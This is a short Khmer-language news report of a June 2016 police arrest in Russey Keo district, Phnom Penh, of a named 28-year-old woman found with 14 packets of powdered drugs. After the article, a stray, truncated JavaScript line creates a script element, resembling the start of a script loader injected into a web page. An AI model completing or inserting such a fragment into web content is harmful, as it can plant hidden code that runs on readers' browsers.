សមត្ថកិច្ចខណ្ឌឬស្សីកែវឃាត់ខ្លួននារីម្នាក់ជាមួយថ្នាំញៀន១៤កញ្ចប់
ភ្នំពេញ៖ នារីម្នាក់ត្រូវបាន កំលាំងជំនាញអធិការដ្ឋាននគរបាលខណ្ឌឬស្សីកែវ ដឹកនាំដោយនាយរងផ្នែកព្រហ្មទណ្ឌលោក ម៉ៅ ចាន់ថុន សហការណ៍ជាមួយកម្លាំងប៉ុស្តិ៍នគរបាលរដ្ឋបាលឬស្សីកែវធ្វើការឃាត់ខ្លួនជាក់ស្ដែង កាលពីវេលាម៉ោង៣និង៣០នាទីរសៀល នៅថ្ងៃទី០២ មិថុនាឆ្នាំ ២០១៦ ស្ថិតនៅចំនុចផ្ទះជួល ផ្លូវលំ ក្រុមទី១០ ភូមិសាមគ្គី សង្កាត់ឬស្សីកែវ ខណ្ឌឬស្សីកែវ រារាជធានីភ្នំពេញ ដោយដកហូតបានថ្នាំញៀនជាច្រើនគ្រាប់។
លោកណយ ច័ន្ទណារ័ត្ន មន្ត្រីផ្នែកព្រហ្មទណ្ឌបានអោយបណ្តាញព័ត៌មាន TNNយើងដឹងថានៅក្នុងកិច្ចប្រតិបត្តិការបង្ក្រាបនេះសមត្ថកិច្ចឃាត់បាននារីសង្ស័យម្នាក់ឈ្មោះពៅ បុប្ផា ភេទស្រី អាយុ២៨ឆ្នាំ មានទីលំនៅកន្លែងកើតហេតុខាងលើ ក្នុងនោះកម្លាំងសមត្ថកិច្ចបានដកហូតបានថ្នាំញៀន ប្រភេទម្សៅក្រាមព៌ណសរថ្លាចំនួន១៤កញ្ចប់តូច ថង់ច្រកថ្នាំញៀនមួយចំនួន ឧបករណ៍សំរាប់ជក់ថ្នាំមួយ ទូរស័ព្វណូគា១គ្រឿង និងប្រាក់ ១០០០០រៀលផងដែរ។
បច្ចុប្បន្នស្ត្រីខាងលើត្រូវបានកម្លាំងបញ្ជូនមកឃុំខ្លួនជាបណ្តោះអាសន្ននៅអធិការដ្ឋាននគរបាលខណ្ឌឬស្សីកែវ ដើម្បីកសាងសុំណុំរឿងបញ្ចូនជនសង្ស័យឡើងតុលារការចាត់ការតាមផ្លូវច្បាប់ ៕
var d=document;var s=d.createElement(‘script’);